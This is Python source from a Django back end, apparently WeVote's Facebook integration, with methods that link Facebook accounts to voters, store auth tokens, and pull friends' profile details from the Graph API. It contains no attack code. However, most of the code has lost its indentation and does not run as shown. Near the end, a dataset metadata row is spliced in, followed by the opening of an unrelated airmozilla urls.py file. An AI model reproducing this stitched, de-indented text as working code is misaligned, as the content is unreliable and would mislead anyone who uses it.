# Write over existing voter_we_vote_id
create_new_facebook_link = False
try:
facebook_link_to_voter.voter_we_vote_id = voter_we_vote_id
facebook_link_to_voter.save()
success = True
except Exception as e:
status += "FACEBOOK_LINK_TO_VOTER-UPDATE_VOTER_WE_VOTE_ID_FAILED (" + str(voter_we_vote_id) + ") "
handle_exception(e, logger=logger, exception_message=status)
success = False
except FacebookAuthResponse.DoesNotExist:
status += "EXISTING_FACEBOOK_LINK_TO_VOTER_DOES_NOT_EXIST "
except Exception as e:
status += "FACEBOOK_LINK_TO_VOTER-GET_FAILED "
handle_exception(e, logger=logger, exception_message=status)
# Any attempts to save a facebook_link using either facebook_user_id or voter_we_vote_id that already
# exist in the table will fail, since those fields are required to be unique.
if create_new_facebook_link:
facebook_secret_key = generate_random_string(12)
try:
facebook_link_to_voter = FacebookLinkToVoter.objects.create(
facebook_user_id=facebook_user_id,
voter_we_vote_id=voter_we_vote_id,
secret_key=facebook_secret_key,
)
facebook_link_to_voter_saved = True
success = True
status += "FACEBOOK_LINK_TO_VOTER_CREATED "
except Exception as e:
facebook_link_to_voter_saved = False
facebook_link_to_voter = FacebookLinkToVoter()
success = False
status += "FACEBOOK_LINK_TO_VOTER_NOT_CREATED "
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_link_to_voter_saved': facebook_link_to_voter_saved,
'facebook_link_to_voter': facebook_link_to_voter,
}
return results
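    # Illustrative usage (hypothetical ids): link a Facebook account to a voter and check the outcome.
    #   results = FacebookManager().create_facebook_link_to_voter(1234567890, "wv02voter1234")
    #   if results['facebook_link_to_voter_saved']:
    #       facebook_link_to_voter = results['facebook_link_to_voter']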
def update_or_create_facebook_auth_response(
self, voter_device_id, facebook_access_token, facebook_user_id, facebook_expires_in,
facebook_signed_request,
facebook_email, facebook_first_name, facebook_middle_name, facebook_last_name,
facebook_profile_image_url_https, facebook_background_image_url_https,
facebook_background_image_offset_x, facebook_background_image_offset_y):
"""
:param voter_device_id:
:param facebook_access_token:
:param facebook_user_id:
:param facebook_expires_in:
:param facebook_signed_request:
:param facebook_email:
:param facebook_first_name:
:param facebook_middle_name:
:param facebook_last_name:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:return:
"""
defaults = {
"voter_device_id": voter_device_id,
}
if positive_value_exists(facebook_access_token):
defaults["facebook_access_token"] = facebook_access_token
if positive_value_exists(facebook_user_id):
defaults["facebook_user_id"] = facebook_user_id
if positive_value_exists(facebook_expires_in):
defaults["facebook_expires_in"] = facebook_expires_in
if positive_value_exists(facebook_signed_request):
defaults["facebook_signed_request"] = facebook_signed_request
if positive_value_exists(facebook_email):
defaults["facebook_email"] = facebook_email
if positive_value_exists(facebook_first_name):
defaults["facebook_first_name"] = facebook_first_name
if positive_value_exists(facebook_middle_name):
defaults["facebook_middle_name"] = facebook_middle_name
if positive_value_exists(facebook_last_name):
defaults["facebook_last_name"] = facebook_last_name
if positive_value_exists(facebook_profile_image_url_https):
defaults["facebook_profile_image_url_https"] = facebook_profile_image_url_https
if positive_value_exists(facebook_background_image_url_https):
defaults["facebook_background_image_url_https"] = facebook_background_image_url_https
# A zero value for the offsets can be a valid value. If we received an image, we also received the offsets.
try:
defaults["facebook_background_image_offset_x"] = int(facebook_background_image_offset_x)
except Exception:
defaults["facebook_background_image_offset_x"] = 0
try:
defaults["facebook_background_image_offset_y"] = int(facebook_background_image_offset_y)
except Exception:
defaults["facebook_background_image_offset_y"] = 0
try:
facebook_auth_response, created = FacebookAuthResponse.objects.update_or_create(
voter_device_id__iexact=voter_device_id,
defaults=defaults,
)
facebook_auth_response_saved = True
success = True
status = "FACEBOOK_AUTH_RESPONSE_UPDATED_OR_CREATED"
except Exception as e:
facebook_auth_response_saved = False
facebook_auth_response = FacebookAuthResponse()
success = False
created = False
status = "FACEBOOK_AUTH_RESPONSE_NOT_UPDATED_OR_CREATED"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_auth_response_saved': facebook_auth_response_saved,
'facebook_auth_response_created': created,
'facebook_auth_response': facebook_auth_response,
}
return results
def create_or_update_facebook_friends_using_we_vote(self, facebook_id_of_me, facebook_id_of_my_friend):
"""
We use this subroutine to create or update FacebookFriendsUsingWeVote table with my friends facebook id.
:param facebook_id_of_me:
:param facebook_id_of_my_friend:
:return:
"""
try:
facebook_friends_using_we_vote, created = FacebookFriendsUsingWeVote.objects.update_or_create(
facebook_id_of_me=facebook_id_of_me,
facebook_id_of_my_friend=facebook_id_of_my_friend,
defaults={
'facebook_id_of_me': facebook_id_of_me,
'facebook_id_of_my_friend': facebook_id_of_my_friend
}
)
facebook_friends_using_we_vote_saved = True
success = True
status = "FACEBOOK_FRIENDS_USING_WE_VOTE_CREATED"
except Exception as e:
facebook_friends_using_we_vote_saved = False
facebook_friends_using_we_vote = FacebookFriendsUsingWeVote()
success = False
status = "FACEBOOK_FRIENDS_USING_WE_VOTE_CREATED"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_friends_using_we_vote_saved': facebook_friends_using_we_vote_saved,
'facebook_friends_using_we_vote': facebook_friends_using_we_vote,
}
return results
def create_or_update_facebook_user(self, facebook_user_id, facebook_user_first_name, facebook_user_middle_name,
facebook_user_last_name, facebook_user_name=None, facebook_user_location_id=None,
facebook_user_location_name=None, facebook_user_gender=None,
facebook_user_birthday=None, facebook_profile_image_url_https=None,
facebook_background_image_url_https=None, facebook_user_about=None,
facebook_user_is_verified=False, facebook_user_friend_total_count=None,
we_vote_hosted_profile_image_url_large=None,
we_vote_hosted_profile_image_url_medium=None,
we_vote_hosted_profile_image_url_tiny=None,
facebook_email=None):
"""
We use this subroutine to create or update FacebookUser table with my friends details.
:param facebook_user_id:
:param facebook_user_first_name:
:param facebook_user_middle_name:
:param facebook_user_last_name:
:param facebook_user_name:
:param facebook_user_location_id:
:param facebook_user_location_name:
:param facebook_user_gender:
:param facebook_user_birthday:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_user_about:
:param facebook_user_is_verified:
:param facebook_user_friend_total_count:
:param we_vote_hosted_profile_image_url_large:
:param we_vote_hosted_profile_image_url_medium:
:param we_vote_hosted_profile_image_url_tiny:
:param facebook_email:
:return:
"""
try:
# for facebook_user_entry in facebook_users:
facebook_user, created = FacebookUser.objects.update_or_create(
facebook_user_id=facebook_user_id,
defaults={
'facebook_user_id': facebook_user_id,
'facebook_user_name': facebook_user_name,
'facebook_user_first_name': facebook_user_first_name,
'facebook_user_middle_name': facebook_user_middle_name,
'facebook_user_last_name': facebook_user_last_name,
'facebook_email': facebook_email,
'facebook_user_location_id': facebook_user_location_id,
'facebook_user_location_name': facebook_user_location_name,
'facebook_user_gender': facebook_user_gender,
'facebook_user_birthday': facebook_user_birthday,
'facebook_profile_image_url_https': facebook_profile_image_url_https,
'facebook_background_image_url_https': facebook_background_image_url_https,
'facebook_user_about': facebook_user_about,
'facebook_user_is_verified': facebook_user_is_verified,
'facebook_user_friend_total_count': facebook_user_friend_total_count,
'we_vote_hosted_profile_image_url_large': we_vote_hosted_profile_image_url_large,
'we_vote_hosted_profile_image_url_medium': we_vote_hosted_profile_image_url_medium,
'we_vote_hosted_profile_image_url_tiny': we_vote_hosted_profile_image_url_tiny
}
)
facebook_user_saved = True
success = True
status = " FACEBOOK_USER_CREATED"
except Exception as e:
facebook_user_saved = False
facebook_user = FacebookUser()
success = False
status = " FACEBOOK_USER_NOT_CREATED"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_user_saved': facebook_user_saved,
'facebook_user': facebook_user,
}
return results
def reset_facebook_user_image_details(self, facebook_user_id, facebook_profile_image_url_https,
facebook_background_image_url_https):
"""
        Reset a facebook user entry to the original image details from the we vote image.
:param facebook_user_id:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:return:
"""
success = False
status = "ENTERING_RESET_FACEBOOK_USER_IMAGE_DETAILS"
values_changed = False
facebook_user_results = self.retrieve_facebook_user_by_facebook_user_id(facebook_user_id)
facebook_user = facebook_user_results['facebook_user']
if facebook_user_results['facebook_user_found']:
if positive_value_exists(facebook_profile_image_url_https):
facebook_user.facebook_profile_image_url_https = facebook_profile_image_url_https
values_changed = True
if positive_value_exists(facebook_background_image_url_https):
facebook_user.facebook_background_image_url_https = facebook_background_image_url_https
values_changed = True
facebook_user.we_vote_hosted_profile_image_url_large = ''
facebook_user.we_vote_hosted_profile_image_url_medium = ''
facebook_user.we_vote_hosted_profile_image_url_tiny = ''
if values_changed:
facebook_user.save()
success = True
status = "RESET_FACEBOOK_USER_IMAGE_DETAILS"
else:
success = True
status = "NO_CHANGES_RESET_TO_FACEBOOK_USER_IMAGE_DETAILS"
results = {
'success': success,
'status': status,
'facebook_user': facebook_user,
}
return results
def update_facebook_user_details(self, facebook_user,
cached_facebook_profile_image_url_https=False,
cached_facebook_background_image_url_https=False,
we_vote_hosted_profile_image_url_large=False,
we_vote_hosted_profile_image_url_medium=False,
we_vote_hosted_profile_image_url_tiny=False):
"""
        Update a facebook user entry with cached image urls
:param facebook_user:
:param cached_facebook_profile_image_url_https:
:param cached_facebook_background_image_url_https:
:param we_vote_hosted_profile_image_url_large:
:param we_vote_hosted_profile_image_url_medium:
:param we_vote_hosted_profile_image_url_tiny:
:return:
"""
success = False
status = "ENTERING_UPDATE_FACEBOOK_USER_DETAILS"
values_changed = False
if facebook_user:
if positive_value_exists(cached_facebook_profile_image_url_https):
facebook_user.facebook_profile_image_url_https = cached_facebook_profile_image_url_https
values_changed = True
if positive_value_exists(cached_facebook_background_image_url_https):
facebook_user.facebook_background_image_url_https = cached_facebook_background_image_url_https
values_changed = True
if positive_value_exists(we_vote_hosted_profile_image_url_large):
facebook_user.we_vote_hosted_profile_image_url_large = we_vote_hosted_profile_image_url_large
values_changed = True
if positive_value_exists(we_vote_hosted_profile_image_url_medium):
facebook_user.we_vote_hosted_profile_image_url_medium = we_vote_hosted_profile_image_url_medium
values_changed = True
if positive_value_exists(we_vote_hosted_profile_image_url_tiny):
facebook_user.we_vote_hosted_profile_image_url_tiny = we_vote_hosted_profile_image_url_tiny
values_changed = True
if values_changed:
facebook_user.save()
success = True
status = "SAVED_FACEBOOK_USER_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_FACBOOK_USER_DETAILS"
results = {
'success': success,
'status': status,
'facebook_user': facebook_user,
}
return results
def retrieve_facebook_auth_response(self, voter_device_id):
"""
:param voter_device_id:
:return:
"""
facebook_auth_response = FacebookAuthResponse()
facebook_auth_response_id = 0
try:
if positive_value_exists(voter_device_id):
facebook_auth_response = FacebookAuthResponse.objects.get(
voter_device_id__iexact=voter_device_id,
)
facebook_auth_response_id = facebook_auth_response.id
facebook_auth_response_found = True
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_FOUND_BY_VOTER_DEVICE_ID "
else:
facebook_auth_response_found = False
success = False
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_VARIABLES_MISSING "
except FacebookAuthResponse.DoesNotExist:
facebook_auth_response_found = False
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_NOT_FOUND "
except Exception as e:
facebook_auth_response_found = False
success = False
status = 'FAILED retrieve_facebook_auth_response '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_auth_response_found': facebook_auth_response_found,
'facebook_auth_response_id': facebook_auth_response_id,
'facebook_auth_response': facebook_auth_response,
}
return results
def retrieve_facebook_auth_response_from_facebook_id(self, facebook_user_id):
"""
Retrieve facebook auth response from facebook user id
:param facebook_user_id:
:return:
"""
facebook_auth_response = FacebookAuthResponse()
facebook_auth_response_id = 0
try:
if positive_value_exists(facebook_user_id):
facebook_auth_response = FacebookAuthResponse.objects.get(
facebook_user_id=facebook_user_id,
)
facebook_auth_response_id = facebook_auth_response.id
facebook_auth_response_found = True
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_FOUND_BY_FACEBOOK_USER_ID "
else:
facebook_auth_response_found = False
success = False
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_VARIABLES_MISSING "
except FacebookAuthResponse.DoesNotExist:
facebook_auth_response_found = False
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_NOT_FOUND "
except Exception as e:
facebook_auth_response_found = False
success = False
status = 'FAILED retrieve_facebook_auth_response'
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_auth_response_found': facebook_auth_response_found,
'facebook_auth_response_id': facebook_auth_response_id,
'facebook_auth_response': facebook_auth_response,
}
return results
def fetch_facebook_id_from_voter_we_vote_id(self, voter_we_vote_id):
facebook_user_id = 0
facebook_results = self.retrieve_facebook_link_to_voter(facebook_user_id, voter_we_vote_id)
if facebook_results['facebook_link_to_voter_found']:
facebook_link_to_voter = facebook_results['facebook_link_to_voter']
facebook_user_id = facebook_link_to_voter.facebook_user_id
return facebook_user_id
def retrieve_facebook_link_to_voter_from_facebook_id(self, facebook_user_id):
return self.retrieve_facebook_link_to_voter(facebook_user_id)
def retrieve_facebook_link_to_voter_from_voter_we_vote_id(self, voter_we_vote_id):
facebook_user_id = 0
facebook_secret_key = ""
return self.retrieve_facebook_link_to_voter(facebook_user_id, voter_we_vote_id, facebook_secret_key)
def retrieve_facebook_link_to_voter_from_facebook_secret_key(self, facebook_secret_key):
facebook_user_id = 0
voter_we_vote_id = ""
return self.retrieve_facebook_link_to_voter(facebook_user_id, voter_we_vote_id, facebook_secret_key)
def retrieve_facebook_link_to_voter(self, facebook_user_id=0, voter_we_vote_id='', facebook_secret_key=''):
"""
:param facebook_user_id:
:param voter_we_vote_id:
:param facebook_secret_key:
:return:
"""
facebook_link_to_voter = FacebookLinkToVoter()
facebook_link_to_voter_id = 0
try:
if positive_value_exists(facebook_user_id):
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
facebook_user_id=facebook_user_id,
)
facebook_link_to_voter_id = facebook_link_to_voter.id
facebook_link_to_voter_found = True
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_FOUND_BY_FACEBOOK_USER_ID "
elif positive_value_exists(voter_we_vote_id):
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
voter_we_vote_id__iexact=voter_we_vote_id,
)
facebook_link_to_voter_id = facebook_link_to_voter.id
facebook_link_to_voter_found = True
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_FOUND_BY_VOTER_WE_VOTE_ID "
elif positive_value_exists(facebook_secret_key):
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
secret_key=facebook_secret_key,
)
facebook_link_to_voter_id = facebook_link_to_voter.id
facebook_link_to_voter_found = True
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_FOUND_BY_FACEBOOK_SECRET_KEY "
else:
facebook_link_to_voter_found = False
success = False
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_VARIABLES_MISSING "
except FacebookLinkToVoter.DoesNotExist:
facebook_link_to_voter_found = False
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_NOT_FOUND"
except Exception as e:
facebook_link_to_voter_found = False
success = False
status = 'FAILED retrieve_facebook_link_to_voter '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_link_to_voter_found': facebook_link_to_voter_found,
'facebook_link_to_voter_id': facebook_link_to_voter_id,
'facebook_link_to_voter': facebook_link_to_voter,
}
return results
def extract_facebook_details_data(self, facebook_friend_api_details_entry):
"""
Extracting facebook friend details with required fields
:param facebook_friend_api_details_entry:
:return:
"""
facebook_friend_dict = {}
facebook_friend_dict['facebook_user_id'] = (facebook_friend_api_details_entry.get('id')
if 'id' in facebook_friend_api_details_entry.keys() else None)
facebook_friend_dict['facebook_user_name'] = (facebook_friend_api_details_entry.get('name')
if 'name' in facebook_friend_api_details_entry.keys() else "")
facebook_friend_dict['facebook_user_first_name'] = (facebook_friend_api_details_entry.get('first_name')
if 'first_name' in facebook_friend_api_details_entry.keys()
else "")
facebook_friend_dict['facebook_user_middle_name'] = (facebook_friend_api_details_entry.get('middle_name')
if 'middle_name' in facebook_friend_api_details_entry.
keys() else "")
facebook_friend_dict['facebook_user_last_name'] = (facebook_friend_api_details_entry.get('last_name')
if 'last_name' in facebook_friend_api_details_entry.keys()
else "")
facebook_friend_dict['facebook_user_location_id'] = (facebook_friend_api_details_entry.get('location').get('id')
if 'location' in facebook_friend_api_details_entry.keys()
and facebook_friend_api_details_entry.
get('location', {}).get('id', {}) else None)
facebook_friend_dict['facebook_user_location_name'] = (facebook_friend_api_details_entry.get('location').get(
'name') if 'location' in facebook_friend_api_details_entry.keys() and facebook_friend_api_details_entry.get(
'location', {}).get('name', {}) else "")
facebook_friend_dict['facebook_user_gender'] = (facebook_friend_api_details_entry.get('gender')
if 'gender' in facebook_friend_api_details_entry.keys() else "")
facebook_friend_dict['facebook_user_birthday'] = (facebook_friend_api_details_entry.get('birthday')
if 'birthday' in facebook_friend_api_details_entry.keys()
else "")
# is_silhouette is true for default image of facebook
facebook_friend_dict['facebook_profile_image_url_https'] = \
(facebook_friend_api_details_entry.get(
'picture').get('data').get('url') if 'picture' in facebook_friend_api_details_entry.keys() and
facebook_friend_api_details_entry.get('picture', {}).get('data', {}).get('url', {}) and
not facebook_friend_api_details_entry.get('picture', {}).get('data', {}).get('is_silhouette', True)
else "")
facebook_friend_dict['facebook_background_image_url_https'] = \
(facebook_friend_api_details_entry.get('cover').get('source')
if 'cover' in facebook_friend_api_details_entry.keys() and
facebook_friend_api_details_entry.get('cover', {}).get('source', {}) else "")
facebook_friend_dict['facebook_user_about'] = (facebook_friend_api_details_entry.get('about')
if 'about' in facebook_friend_api_details_entry.keys() else "")
facebook_friend_dict['facebook_user_is_verified'] = (facebook_friend_api_details_entry.get('is_verified')
if 'is_verified' in facebook_friend_api_details_entry.
keys() else "")
return facebook_friend_dict
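    # Illustrative example (hypothetical Graph API entry, trimmed to a few fields):
    #   entry = {'id': '1234', 'name': 'Jane Doe', 'first_name': 'Jane', 'last_name': 'Doe',
    #            'picture': {'data': {'url': 'https://example.org/pic.jpg', 'is_silhouette': False}}}
    #   FacebookManager().extract_facebook_details_data(entry) returns a dict keyed by
    #   'facebook_user_id', 'facebook_user_name', 'facebook_profile_image_url_https', etc.,
    #   with empty strings (or None for the id fields) where the entry has no data.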
def retrieve_facebook_friends_from_facebook(self, voter_device_id):
"""
This function is for getting facebook friends who are already using WeVote
NOTE August 2017: The facebook "friends" API call when called from the server now only returns that subset of
        your facebook friends who are already on WeVote; it will not show your friends who do not have the facebook
        app on their facebook settings page. It is unclear if this code even works at all. The code that does the
        job is in the WebApp using the "games" api "invitable_friends" call.
        If you run into problems, see the note in the client-side WebApp file FacebookInvitableFriends.jsx
        Technical discussion: https://stackoverflow.com/questions/23417356
        We use this routine to retrieve my facebook friends' details and update the FacebookFriendsUsingWeVote table
:param voter_device_id:
:return: facebook_friends_list
"""
success = False
status = ''
facebook_friends_list_found = False
facebook_friends_list = []
facebook_api_fields = "id, name, first_name, middle_name, last_name, location{id, name}, gender, birthday, " \
"cover{source}, picture.width(200).height(200){url, is_silhouette}, about, is_verified "
auth_response_results = self.retrieve_facebook_auth_response(voter_device_id)
if not auth_response_results['facebook_auth_response_found']:
error_results = {
'status': "FACEBOOK_AUTH_RESPONSE_NOT_FOUND",
'success': success,
'facebook_friends_list_found': facebook_friends_list_found,
'facebook_friends_list': facebook_friends_list,
}
return error_results
facebook_auth_response = auth_response_results['facebook_auth_response']
try:
facebook_graph = facebook.GraphAPI(facebook_auth_response.facebook_access_token, version='2.7')
facebook_friends_api_details = facebook_graph.get_connections(id=facebook_auth_response.facebook_user_id,
connection_name="friends",
fields=facebook_api_fields)
# graph.get_connections returns three dictionary keys i.e. data, paging, summary,
# here data key contains list of friends with the given fields values and paging contains cursors positions
# and summary contains total_count of your friends, for ex:
# {"data": [{"name": "Micheal", "first_name": "Micheal", "id": "16086981492"},
# {"name": "John", "first_name": "John", "id": "1263984"],
# "paging": {"cursors": {"before": "QVFmc0QVBsZAk1KWmNwRVFoRzB1MGFDWlpoa3J0NFR6VTQZD",
# "after": "QVFIUlAzdGplaWV5YTZAmeUNCNzVuRk1iPZAnhUNjltUldoSjR5aWZAxdGJ2UktEUHQzNWpBeHRmcEkZD"}},
# "summary": {'total_count': 10}}
for facebook_friend_api_details_entry in facebook_friends_api_details.get('data', []):
# Extract required details for each facebook friend and then updating FacebookFriendsUsingWeVote table
facebook_friend_dict = self.extract_facebook_details_data(facebook_friend_api_details_entry)
facebook_friend_dict['facebook_user_friend_total_count'] = (
facebook_friend_api_details_entry.get('friends').get('summary').get('total_count')
if facebook_friend_api_details_entry.get('friends', {}).get('summary', {}).get('total_count', {})
else None)
if facebook_friend_dict not in facebook_friends_list:
facebook_friends_list.append(facebook_friend_dict)
facebook_friends_saved_results = self.create_or_update_facebook_friends_using_we_vote(
facebook_auth_response.facebook_user_id, facebook_friend_dict.get('facebook_user_id'))
status += ' ' + facebook_friends_saved_results['status']
if facebook_friends_api_details.get('data', []).__len__() == 0:
logger.debug("retrieve_facebook_friends_from_facebook received zero friends from the API")
success = True
status += " " + "FACEBOOK_FRIENDS_LIST_FOUND"
facebook_friends_list_found = True
except Exception as e:
success = False
status += " " + "FACEBOOK_FRIENDS_LIST_FAILED_WITH_EXCEPTION"
facebook_friends_list_found = False
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_friends_list_found': facebook_friends_list_found,
'facebook_friends_list': facebook_friends_list,
}
return results
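    # Illustrative usage (assumes the voter_device_id has a stored FacebookAuthResponse):
    #   results = FacebookManager().retrieve_facebook_friends_from_facebook(voter_device_id)
    #   if results['facebook_friends_list_found']:
    #       for friend in results['facebook_friends_list']:
    #           print(friend['facebook_user_id'], friend['facebook_user_name'])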
def retrieve_facebook_friends_using_we_vote_list(self, facebook_id_of_me):
"""
        Retrieve my friends' facebook ids from the FacebookFriendsUsingWeVote table.
:param facebook_id_of_me:
:return:
"""
status = ""
facebook_friends_using_we_vote_list = []
if not positive_value_exists(facebook_id_of_me):
success = False
status = 'RETRIEVE_FACEBOOK_FRIENDS_USING_WE_VOTE-MISSING_FACEBOOK_ID '
results = {
'success': success,
'status': status,
'facebook_friends_using_we_vote_list_found': False,
'facebook_friends_using_we_vote_list': [],
}
return results
try:
facebook_friends_using_we_vote_queryset = FacebookFriendsUsingWeVote.objects.all()
facebook_friends_using_we_vote_queryset = facebook_friends_using_we_vote_queryset.filter(
facebook_id_of_me=facebook_id_of_me)
facebook_friends_using_we_vote_list = facebook_friends_using_we_vote_queryset
if len(facebook_friends_using_we_vote_list):
success = True
facebook_friends_using_we_vote_list_found = True
status += ' FACEBOOK_FRIENDS_USING_WE_VOTE_LIST_RETRIEVED '
else:
success = True
facebook_friends_using_we_vote_list_found = False
status += ' NO_FACEBOOK_FRIENDS_USING_WE_VOTE_LIST_RETRIEVED '
except FacebookFriendsUsingWeVote.DoesNotExist:
# No data found. Not a problem.
success = True
facebook_friends_using_we_vote_list_found = False
status += ' NO_FACEBOOK_FRIENDS_USING_WE_VOTE_LIST_RETRIEVED_DoesNotExist '
facebook_friends_using_we_vote_list = []
except Exception as e:
success = False
facebook_friends_using_we_vote_list_found = False
status += ' FAILED retrieve_facebook_friends_using_we_vote_list FacebookFriendsUsingWeVote '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_friends_using_we_vote_list_found': facebook_friends_using_we_vote_list_found,
'facebook_friends_using_we_vote_list': facebook_friends_using_we_vote_list,
}
return results
def extract_facebook_user_details(self, facebook_user_api_details):
"""
Extracting facebook user details with required fields
:param facebook_user_api_details:
:return:
"""
facebook_user_details_dict = {
'facebook_search_found': True
}
facebook_user_details_dict['about'] = (facebook_user_api_details.get('about')
if 'about' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['location'] = ""
if 'location' in facebook_user_api_details.keys():
if 'city' in facebook_user_api_details.get('location'):
facebook_user_details_dict['location'] += facebook_user_api_details.get('location').get('city')
if 'street' in facebook_user_api_details.get('location'):
facebook_user_details_dict['location'] += ", " + facebook_user_api_details.get('location').get('street')
if 'zip' in facebook_user_api_details.get('location'):
facebook_user_details_dict['location'] += ", " + facebook_user_api_details.get('location').get('zip')
photos = (facebook_user_api_details.get('photos').get(
'data') if 'photos' in facebook_user_api_details.keys() and facebook_user_api_details.get(
'photos', {}).get('data', []) else "")
facebook_user_details_dict['photos'] = " ".join([str(photo.get('picture'))
for photo in photos if 'picture' in photo.keys()])
facebook_user_details_dict['bio'] = (facebook_user_api_details.get('bio')
if 'bio' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['general_info'] = (facebook_user_api_details.get('general_info')
if 'general_info' in facebook_user_api_details.
keys() else "")
facebook_user_details_dict['description'] = (facebook_user_api_details.get('description')
if 'description' in facebook_user_api_details.keys()
else "")
facebook_user_details_dict['features'] = (facebook_user_api_details.get('features')
if 'features' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['contact_address'] = (facebook_user_api_details.get('contact_address')
if 'contact_address' in
facebook_user_api_details.keys() else "")
facebook_user_details_dict['emails'] = " ".join(facebook_user_api_details.get('emails')
if 'emails' in facebook_user_api_details.keys() else [])
facebook_user_details_dict['name'] = (facebook_user_api_details.get('name')
if 'name' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['mission'] = (facebook_user_api_details.get('mission')
if 'mission' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['category'] = (facebook_user_api_details.get('category')
if 'category' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['website'] = (facebook_user_api_details.get('website')
if 'website' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['personal_interests'] = (facebook_user_api_details.get('personal_interests')
if 'personal_interests' in
facebook_user_api_details.keys() else "")
facebook_user_details_dict['personal_info'] = (facebook_user_api_details.get('personal_info')
if 'personal_info' in facebook_user_api_details.keys()
else "")
posts = (facebook_user_api_details.get('posts').get(
'data') if 'posts' in facebook_user_api_details.keys() and facebook_user_api_details.get(
'posts', {}).get('data', []) else "")
facebook_user_details_dict['posts'] = " ".join([str(post.get('message'))
for post in posts if 'message' in post.keys()])
return facebook_user_details_dict
def retrieve_facebook_user_details_from_facebook(self, voter_device_id, facebook_user_name):
"""
:param voter_device_id:
:param facebook_user_name:
:return:
"""
success = False
status = ''
facebook_user_details_found = False
facebook_user_details_dict = {
'facebook_search_found': facebook_user_details_found
}
facebook_api_fields = "about, location, photos{picture}, bio, general_info, description, features, " \
"contact_address, emails, posts.limit(10){message}, name, mission, category," \
"website, personal_interests, personal_info"
auth_response_results = self.retrieve_facebook_auth_response(voter_device_id)
if not auth_response_results['facebook_auth_response_found']:
error_results = {
'status': "FACEBOOK_AUTH_RESPONSE_NOT_FOUND",
'success': success,
'facebook_user_details_found': facebook_user_details_found,
'facebook_user_details': facebook_user_details_dict,
}
return error_results
facebook_auth_response = auth_response_results['facebook_auth_response']
try:
facebook_graph = facebook.GraphAPI(facebook_auth_response.facebook_access_token, version='2.7')
facebook_user_api_details = facebook_graph.get_object(id=facebook_user_name,
fields=facebook_api_fields)
facebook_user_details_dict = self.extract_facebook_user_details(facebook_user_api_details)
success = True
status += " " + "FACEBOOK_USER_DETAILS_FOUND"
facebook_user_details_found = True
except Exception as e:
success = False
status += " " + "FACEBOOK_USER_DETAILS_FAILED_WITH_EXCEPTION"
facebook_user_details_found = False
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_user_details_found': facebook_user_details_found,
'facebook_user_details': facebook_user_details_dict,
}
return results
def retrieve_facebook_user_by_facebook_user_id(self, facebook_user_id):
"""
Retrieve facebook user from FacebookUser table.
:param facebook_user_id:
:return:
"""
status = ""
facebook_user = FacebookUser()
try:
facebook_user = FacebookUser.objects.get(
facebook_user_id=facebook_user_id
)
success = True
facebook_user_found = True
status += ' FACEBOOK_USER_RETRIEVED '
except FacebookUser.DoesNotExist:
# No data found. Not a problem.
success = True
facebook_user_found = False
status += ' NO_FACEBOOK_USER_RETRIEVED_DoesNotExist '
except Exception as e:
success = False
facebook_user_found = False
status += ' FAILED retrieve_facebook_user FacebookUser '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_user_found': facebook_user_found,
'facebook_user': facebook_user,
}
return results
def remove_my_facebook_entry_from_suggested_friends_list(self, facebook_suggested_friends_list, facebook_id_of_me):
"""
        The Facebook graph API call for a friend's friends also returns the user's own entry, so remove it
        from the suggested friends list
:param facebook_suggested_friends_list:
:param facebook_id_of_me:
:return:
"""
        for facebook_user_entry in list(facebook_suggested_friends_list):  # iterate over a copy so .remove() is safe
if convert_to_int(facebook_user_entry['facebook_user_id']) == facebook_id_of_me:
facebook_suggested_friends_list.remove(facebook_user_entry)
return facebook_suggested_friends_list
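    # Illustrative example (hypothetical ids):
    #   FacebookManager().remove_my_facebook_entry_from_suggested_friends_list(
    #       [{'facebook_user_id': '111'}, {'facebook_user_id': '222'}], 111)
    #   returns [{'facebook_user_id': '222'}]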
| mit | -7,461,401,211,381,602,000 | 53.536657 | 120 | 0.582764 | false |
kenrick95/airmozilla | airmozilla/urls.py | 1 | 1959 | from django.conf import settings
from django.conf.urls import patterns, include
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
import djcelery
from airmozilla.base.monkeypatches import patch
patch()
handler500 = 'airmozilla.base.views.handler500'
urlpatterns = patterns(
'',
(r'^(?P<path>contribute\.json)$', 'django.views.static.serve',
{'document_root': settings.ROOT}),
(r'^manage/', include('airmozilla.manage.urls', namespace='manage')),
